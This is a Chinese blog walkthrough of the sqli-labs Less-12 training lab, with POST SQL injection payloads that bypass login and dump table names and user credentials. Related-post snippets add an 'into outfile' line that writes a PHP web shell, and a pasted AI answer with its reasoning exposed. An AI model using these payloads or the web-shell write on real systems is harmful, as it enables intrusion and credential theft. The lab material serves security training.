sqli-labs Less-12

最新推荐文章于 2024-08-06 00:06:16 发布
最新推荐文章于 2024-08-06 00:06:16 发布
阅读量314 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42630215/article/details/105116509
本文详细介绍了如何利用Burp Suite进行SQL注入攻击,以Less-12为例,通过判断注入类型、注入点、字段数,到获取数据库名、表名、字段名,最后提取所有字段值的过程。主要涉及双引号加括号的字符串注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-12 POST -Error Based - Double quotes - String - with twist

Less-11 与 Less-12差别在于一个是单引号一个是双引号加括号,对于Less-12就直接用burp suite来做练习,步骤与Less-11基本一致。

0x01.原页面在这里插入图片描述

在这里插入图片描述
用户名和密码两个参数分别为uname和passwd。Burp中提交参数uname=xxx&passwd=xxx

0x02.判断注入类型

uname=1&passwd=1&submit=Submit
在这里插入图片描述
uname=1’&passwd=1&submit=Submit
在这里插入图片描述
uname=1"&passwd=1&submit=Submit

在这里插入图片描述

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1

根据报错语句可以看出是双引号加一个括号的字符型注入

0x03.判断注入点
万能密码尝试:
uname=1") or 1=1#&passwd=1&submit=Submit
在这里插入图片描述0x04.判断字段数

uname=admin") order by 3#&passwd=1&submit=Submit
在这里插入图片描述
uname=admin") order by 2#&passwd=1&submit=Submit
在这里插入图片描述

查询语句返回的字段数为2,但是并不是表中的字段数为2。

0x05.获取用户和数据库名
uname=1") union select user(),database()–+&passwd=1&submit=Submit在这里插入图片描述
0x06.获取security数据库中的所有表名
uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’#&passwd=1&submit=Submit

在这里插入图片描述
0x07.获取users表中所有字段名
uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#&passwd=1&submit=Submit在这里插入图片描述
0x08.获取所有字段值
uname=1") union select 1,group_concat(username,0x3a,password) from users#&passwd=1&submit=Submit

在这里插入图片描述

sqli-lab教程——Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
luosaierdadi的博客
07-09 791
双引号报错型注入按照题意应该是可以使用上一题的payload只需要修改单引号为双引号,但是实际测试不行,无论我使用--+还是%23还是#都不行,我就看了一下php文件:可以看到sql查询语句:@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";构造一个能闭合语句而且会报错的payload:admin" and extractvalue(1,concat(0
sqli-labs less-12 post注入
wanggonghanfei的博客
10-07 857
使用post注入通过sqli-labs十二关,使用hackbar插件
sqli-labs(less-12)
欢迎光临
06-08 1200
有问题....为什么在less-11输入admin' 会报错  输入admin"" 就不会报错在less-12输入admin" 会报错  输入admin' 就不会报错后来发现输入admin'") 都可以使他们报错,哈哈哈这样即可知道是通过("")来闭合参数的接下来就和less-11一样的操作了接下来用sqlmap同理...
sqli————Less-12
Fly_鹏程万里
05-11 710
Less-12源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs-Less-12
weixin_47346400的博客
02-09 229
step1:使用bp进行抓包 uname=admin&passwd=admin&submit=Submit step2:查字段 step3:查看数据库 或查看全部数据库 step4:查看数据库表单 step5:查看字段 step6:报表单中的username和password
Sqlilabs Less-12
Light_inthe_eyes的博客
03-03 262
burpsuite抓包进行注入 判断是双引号单括号字符型注入: uname=admin")#&passwd=&submit=Submit 判断列数: uname=admin")+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin")+union+select+database(),version()#&passwd=&submit=Submit 爆表: uname=-admin")+union+selec
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1075
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs:less-11
羽的博客
07-22 168
POST 单引号注入 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text...
sqli-labs/Less-12
m0_71299382的博客
11-18 271
sqli-labs第十二关
Less-12
m0_62094846的博客
12-26 229
双引号会报错,后面要加) 判断列数 有2列 判断回显位 (1)查库名 (2)查表名 (3)查列名 (4)查数据
SQL注入实例(sqli-labs/less-12
Thewei666的博客
08-06 334
【代码】SQL注入实例(sqli-labs/less-12
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 921
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
2401_84264536的博客
06-20 198
【代码】SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
Sqli-labs Less11-12 基于错误的sql注入 - POST
kevinhanser
08-09 690
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 11: POST - Error Based - Single Quotes - String 测试漏洞 在 username 中输入 admin'--+ 在 password 中输入任意内容 显示错误信息 You have an error in your SQL syntax; c...
Sqli-labsLess-11和Less-12
m0_46315342的博客
06-04 449
                                          &nbs...
sqli-labs less1
最新发布
03-27
<think>好的,我现在需要处理用户关于sqli-labs Less 1的教程或解决方案的请求。首先,我得确认用户提到的sqli-labs是什么。sqli-libs是一个用于练习SQL注入攻击的实验平台,通常被安全研究人员和学习者用来测试和提升他们的技能。Less 1应该是指该平台的第一课,可能涉及基本的SQL注入技术。 接下来,我需要回忆或查找关于sqli-labs第一课的具体内容。通常,第一课可能是一个基于GET请求的字符型注入漏洞。用户可能需要知道如何利用这个漏洞,比如通过闭合引号、注释后续语句,然后使用UNION注入或其他方法获取数据库信息。 然后,我需要确保提供的解决方案步骤正确且详细。例如,确定注入点、测试闭合方式、使用ORDER BY确定列数,然后进行UNION查询获取数据库版本或表信息。同时,需要注意使用正确的语法,比如单引号闭合、注释符--+的使用,以及避免常见错误。 另外,用户可能还需要一些预防措施的建议,比如输入验证、参数化查询等,所以最后要包括防御方法。同时,根据用户之前的指示,生成相关问题,帮助用户进一步学习相关知识。 还要检查是否有站内引用需要添加,但根据用户提供的信息,目前没有具体的引用来源,所以可能需要忽略引用标识或假设某些引用。但根据用户示例,可能需要在某些步骤末尾添加引用标记,比如[^1],但需要确认是否有实际引用来源可用。如果没有的话,可能不需要添加,或者需要用户提供更多资料。 最后,确保回答使用中文,行内公式用$...$,独立公式用$$...$$,但在这个主题中可能用不到数学公式,所以可能可以忽略。但需要保持LaTeX语法正确,如果有变量或代码的话。代码部分需要用代码块包裹,如示例中的Python代码,但这里可能涉及SQL语句,所以需要用SQL的代码块。 总结步骤: 1. 介绍Less 1的基本情况。 2. 详细说明解决方案步骤,包括测试注入点、闭合引号、确定列数、执行UNION注入获取信息。 3. 提供防御建议。 4. 生成相关问题,如其他注入类型、工具使用、预防措施等。 5. 确保格式正确,代码块使用正确语言标记,如SQL。</think>[用户可见层] ### sqli-labs Less 1 解决方案 sqli-labs Less 1 是一个基于GET请求的单引号字符型SQL注入漏洞练习。以下是分步解决方案: #### 1. **确定注入点** 输入参数`id`存在漏洞,尝试添加单引号触发错误: ```sql http://example.com/sqli-labs/Less-1/?id=1' ``` 若返回SQL语法错误(如`You have an error in your SQL syntax`),则确认存在注入。 #### 2. **闭合引号并注释后续语句** 通过闭合单引号并使用注释符`--+`绕过: ```sql http://example.com/sqli-labs/Less-1/?id=1' --+ ``` 此时SQL语句变为: $$SELECT * FROM users WHERE id='1' --+' LIMIT 0,1$$ 注释符`--+`会忽略后续的`LIMIT`语句。 #### 3. **确定列数** 通过`ORDER BY`判断查询结果的列数: ```sql http://example.com/sqli-labs/Less-1/?id=1' ORDER BY 3 --+ ``` 若页面正常返回,说明查询结果有3列;若报错则减少列数重试。 #### 4. **UNION注入获取数据** 利用`UNION SELECT`联合查询获取数据库信息: ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,2,3 --+ ``` 页面会显示`2`和`3`的位置可用于回显数据。 **示例:获取数据库版本和当前数据库名** ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,version(),database() --+ ``` 回显结果类似: ``` 2: 10.3.32-MariaDB 3: security ``` #### 5. **进一步提取表名和字段名** 从`information_schema`中提取信息: ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 回显当前数据库的表名(如`emails,users`),再通过类似方法获取字段名。 --- ### 防御建议 1. **使用参数化查询**(如PDO预处理语句)避免拼接SQL[^1]。 2. **对输入进行严格过滤**,例如仅允许数字类型的`id`参数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值